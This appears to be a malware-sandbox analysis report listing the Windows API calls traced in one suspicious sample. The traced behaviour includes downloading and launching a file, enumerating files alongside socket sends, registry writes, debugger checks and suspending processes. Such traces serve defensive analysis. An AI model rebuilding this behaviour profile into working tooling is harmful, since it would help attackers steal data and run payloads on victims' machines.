                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                                                                                                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                                                                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 745075371-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1157919129-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00448077
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00448243
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1286116820-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                                                                                                                                                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, xrefs: 0040627F, 004063A7
                                                                                                                                                                                                                                                                                                                              • open, xrefs: 0040622E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: DownloadExecuteFileShell
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$open
                                                                                                                                                                                                                                                                                                                              • API String ID: 2825088817-4183282609
                                                                                                                                                                                                                                                                                                                              • Opcode ID: fcc184a7b6eccc8a2ff9a36e892ddfb87c19da3c58e68189f228df038418f8e7
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcc184a7b6eccc8a2ff9a36e892ddfb87c19da3c58e68189f228df038418f8e7
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileFind$FirstNextsend
                                                                                                                                                                                                                                                                                                                              • String ID: x@G$x@G
                                                                                                                                                                                                                                                                                                                              • API String ID: 4113138495-3390264752
                                                                                                                                                                                                                                                                                                                              • Opcode ID: aa45c7380dacfc66fe06201a8734557564ad94b7e762658309b942cdbaa57718
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa45c7380dacfc66fe06201a8734557564ad94b7e762658309b942cdbaa57718
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                                                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                                                                                                                                                              • API String ID: 4127273184-3576401099
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d360fdf2e78990b0619b3c2804760803c56fcbcebbcac8b827f4f8c51bc1c9b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                                                                                                                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                                                                                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4212172061-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • API ID: FileFind$FirstH_prologNext
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 301083792-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6b2e4d6165e84900f69ecc81641d8f2d0541015075ab51dc4241561e145d6464
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b2e4d6165e84900f69ecc81641d8f2d0541015075ab51dc4241561e145d6464
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2829624132-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0043A765
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0043A76F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0043A77C
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 028361DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 028361E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 028361F1
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,1000A5B7), ref: 1000D9C9
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,1000A5B7), ref: 1000D9D3
• UnhandledExceptionFilter.KERNEL32(00000016,?,?,?,?,?,1000A5B7), ref: 1000D9E0
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
• TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
• ExitProcess.KERNEL32 ref: 0044259E
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,02834A8A,?,02842238,0000000C,02834BBD,00000000,00000000,00000001,02832082,02842108,0000000C,02831F3A,?), ref: 02834AD5
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,02834A8A,?,02842238,0000000C,02834BBD,00000000,00000000,00000001,02832082,02842108,0000000C,02831F3A,?), ref: 02834ADC
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02834AEE
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2e82ac95ebfaa13e4254bcfbd0bdeaec5e7b321f3ef4b30d9198a9bfcfe31d89
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 39c37c3579a76c1b1e5554e83d9c6bada3aa5394ff69a917aa5e346f9ea123dc
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e82ac95ebfaa13e4254bcfbd0bdeaec5e7b321f3ef4b30d9198a9bfcfe31d89
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CE0B63E440208AFCF12AF68DD58A893B6AEF40741B104814F9099B161DB39D9A2DB94
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002,00000000), ref: 10014BDD
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002,00000000), ref: 10014BE4
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 10014BF6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 95c76ed56e18f89149474fb52f601925ff153df3b73455ff02c6b642b124ee7d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: deeea49242b6951bce6ccf9b122a28d0d79a9096b4b5a126c2a511b2d40dffe6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95c76ed56e18f89149474fb52f601925ff153df3b73455ff02c6b642b124ee7d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFE0BF35004154FFDB01AF54CD99E483B69FB44291B114014F9055A132CF35ED93DA90
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACDC
                                                                                                                                                                                                                                                                                                                              • NtSuspendProcess.NTDLL(00000000), ref: 0041ACE9
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACF2
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
